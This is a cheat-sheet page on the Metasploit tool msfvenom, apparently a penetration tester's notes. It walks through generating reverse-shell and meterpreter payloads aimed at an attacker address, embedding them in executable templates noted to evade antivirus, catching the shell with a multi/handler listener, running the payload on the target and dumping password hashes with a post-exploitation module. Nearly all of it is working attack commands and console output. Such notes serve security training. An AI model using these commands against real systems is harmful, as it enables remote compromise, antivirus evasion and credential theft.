Msfvenom

LogoMetasploit Unleashed | MSFvenomwww.offsec.com

General syntax

$ msfvenom --payload <payload> --format <format> --platform <platform> --arch <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> --output <output_file>

# short form options
$ msfvenom -p <payload> -f <format> -p <platform> -a <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> -o <output_file>

Help menu

$ msfvenom -h

List available options for module type

$ msfvenom -l payloads
$ msfvenom -l encoders
$ msfvenom -l nops
$ msfvenom -l all

Payload option

$ msfvenom -p ...

# eg. 
$ msfvenom -p linux/x86/shell_reverse_tcp

General naming convention

<OS>/<architecture>/<payload>

  1. OS: Operating system such as Windows, Linux, etc.

  2. Architecture: x64 or x86

  • 32-bit by default, if not specified

  1. Payload: reverse tcp, bind_tcp, etc.

Common payloads

32-bit variant

  1. windows/shell/reverse_tcp

  2. windows/shell_reverse_tcp

64-bit variant

  1. windows/x64/shell/reverse_tcp | linux/x64/shell/reverse_tcp

  2. windows/x64/shell_reverse_tcp | linux/x64/shell_reverse_tcp

  3. windows/x64/meterpreter/reverse_tcp | linux/x64/meterpreter/reverse_tcp

  4. windows/x64/meterpreter_reverse_tcp | linux/x64/meterpreter_reverse_tcp

Format option

$ msfvenom -f ...

# eg.
$ msfvenom -f elf
$ msfvenom -f exe

Note: The output from msfvenom provides the shellcode (typically raw machine code) that can be executed on the target architecture, and is defined by the -p flag. The -f flag simply specifies the format for which the shellcode should be in.

Eg. Powershell

[Byte[]] $buf = 0xfc,0x48,0x83,...

Eg. C

unsigned char buf[] = "\xfc\x48\x83...

Eg. Python

buf = b""

buf += b"\xfc\x48\x8

buf += b"\...

Template

$ msfvenom -x ...
$ msfvenom --template ...

  • can be used to specify a custom executable file to be used as template

  • this means that the original functionality of the provided executable file will be fulfilled, but with the addition of the payload specified by an attacker

  • may bypass AV, etc.

CMD

$ msfvenom -p <platform> CMD="xxxx" -f <format> -o <output_file>.exe

Eg. Generate an x64 Windows .exe payload that executes a certain powershell.exe command (CMD option)

$ msfvenom -p windows/x64/exec CMD="powershell.exe ..." -f exe -o <output_file>.exe

Example

linux/x86/meterpreter/reverse_tcp

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.xxx.xxx LPORT=8000 -f elf > shell.elf

Module to use on the attacking machine to catch a shell

exploit/multi/handler

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport xxxx
msf6 exploit(multi/handler) > run

Run the shellcode on the target machine

# eg.
$ sudo ./shell.elf

Gain meterpreter shell on the attacker machine

meterpreter >

Using post exploitation hash dump module 

meterpreter > background
msf6 exploit(multi/handler) > sessions -l 

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  1         meterpreter x86/linux  ...                    ...

msf6 exploit(multi/handler) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > show options
msf6 post(linux/gather/hashdump) > set session 1
msf6 post(linux/gather/hashdump) > run
...
LogoMetasploit Unleashed | MSFvenomwww.offsec.com
PreviousMeterpreterNextBinary Exploitation

Last updated